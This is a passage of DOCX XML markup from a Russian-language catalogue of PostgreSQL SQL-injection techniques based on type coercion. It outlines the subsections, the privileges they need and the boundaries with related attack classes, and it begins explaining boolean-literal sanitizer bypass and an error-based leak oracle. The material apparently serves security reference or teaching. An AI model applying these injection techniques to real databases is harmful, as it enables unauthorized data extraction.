      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A3D420" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Каждый параметр — отдельная injection-точка с собственной type-семантикой. Общий принцип: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG позволяет приложению свободно конвертировать text↔boolean↔jsonb↔xml↔array</w:t>
      </w:r>
      <w:r>
        <w:t>, что превращает text-injection точку в более мощный канал, чем выглядит снаружи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D862D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Структура подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE128D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.1 Boolean coercion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE bool_col = '$x'</w:t>
      </w:r>
      <w:r>
        <w:t>: text-to-bool implicit cast, error-канал через invalid boolean, sanitizer-обход через широкий набор bool-литералов ('t', 'true', 'yes', '1', 'on'), short-circuit-evaluation сюрпризы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7A3CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.2 jsonb -&gt; и -&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — JSON path operators как DSL: arbitrary key extraction через user-controlled path; jsonpath operators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(PG 12+) с собственным языком query; cast-конфузия через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(data-&gt;&gt;'k')::int</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83F36C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.3 xpath() и XML-tricks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XPath 1.0 injection через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath('$expr', xml_col)</w:t>
      </w:r>
      <w:r>
        <w:t>; функции XPath (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string-length</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) для leak в blind-режиме; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmltable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с computed-path; libxml2 ограничения (no external entities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E4B0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.11.4 Array vs scalar: ANY($1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — driver-уровневые особенности маршалирования: psycopg list→ARRAY[], asyncpg list→bytea, pgjdbc через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Type-confusion при unmarshalled scalar в array-контексте. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string_to_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">injection-точка через separator. Containment-операторы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;@</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с user-controlled array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1032233E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EBC1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 (Error-based) vs 3.11.1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.2.x — error через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (числовой и identifier cast). 3.11.1 — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::boolean</w:t>
      </w:r>
      <w:r>
        <w:t>. Семантически тот же error-based oracle, но boolean-канал имеет уникальные свойства: BOOLEAN cast принимает namespace из 10+ литералов, что создаёт sanitizer-bypass'ы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03A664" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.5 (XML mass dump) vs 3.11.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.8.5 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>дамп всей БД</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3.11.3 — про injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в XPath-выражение</w:t>
      </w:r>
      <w:r>
        <w:t>, которое работает над уже-XML-структурой. Разные точки в pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A12F590" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.6 (OOB) vs 3.11.3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XML с external entity-references (XXE) в большинстве СУБД даёт OOB-канал; в PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmlparse(document ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не загружает external DTD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (libxml2 настроен с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XML_PARSE_NONET</w:t>
      </w:r>
      <w:r>
        <w:t>), поэтому 3.11.3 — про XPath-functions внутри уже-загруженного XML, не про XXE-канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646367BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked) vs 3.11.4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.5 — про разделение команд через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3.11.4 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scalar vs array маршалирование на драйверном уровне</w:t>
      </w:r>
      <w:r>
        <w:t>, ортогонально wire-protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F69A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 (Filter bypass) vs 3.11.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.9 — про encoding/whitespace tricks для обхода input-фильтра. 3.11 — про эксплуатацию правил типов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> прохождения фильтра. Часто комбинируется: 3.9.5 (decode hex) + 3.11.2 (jsonb path) — обход WAF на JSON-key-name через hex-декодирование внутри jsonb_extract_path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4AA52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Привилегии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596DB4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.11 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>синтаксическое и семантическое использование типов</w:t>
      </w:r>
      <w:r>
        <w:t>, не про privileged функции. Все приёмы 3.11.1–3.11.4 работают на PUBLIC — для них нужен только SELECT на целевую таблицу (плюс соответствующий тип колонки: BOOLEAN, JSONB, XML, или контекст с массивами).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27677502" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Исключение — 3.11.3 Payload C (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmltable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с computed path для leak метаданных через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-cast) — требует SUPERUSER или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_all_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (как 3.8.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700A05F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Стандартная структура подразделов 3.11.1–3.11.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1543C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">По </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conventions.md</w:t>
      </w:r>
      <w:r>
        <w:t>: Суть → Уязвимый код (ссылка на 3.11.0) → Payload + Что доходит → Что произойдёт → Почему работает → Требования → Легитимное использование → Версии → Связанные → Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D57539" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FEB60A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Type Conversion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основа для всех подразделов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A8F86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Boolean Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для 3.11.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180E51E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: JSON Functions and Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для 3.11.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E276C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: XML Functions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для 3.11.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3AA0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL Docs: Arrays</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Array Operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для 3.11.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CF94EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.11.1 Boolean coercion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9150FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код — см. 3.11.0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DCF4A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Суть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A225CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BOOLEAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает в качестве text-input один из 10+ литералов (case-insensitive): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'true'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'yes'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'y'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,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 для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'f'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'false'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'no'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'n'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'0'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'off'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>. Implicit cast text→boolean происходит автоматически в WHERE-comparison против BOOLEAN-колонки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3190E45E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Это создаёт три класса уязвимостей:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95BB26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error-based oracle через invalid boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — text, не соответствующий ни одному из bool-литералов, ломает cast с детальной ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type boolean: "&lt;значение&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;значение&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атакующий пробрасывает leak-результат subquery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713961D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
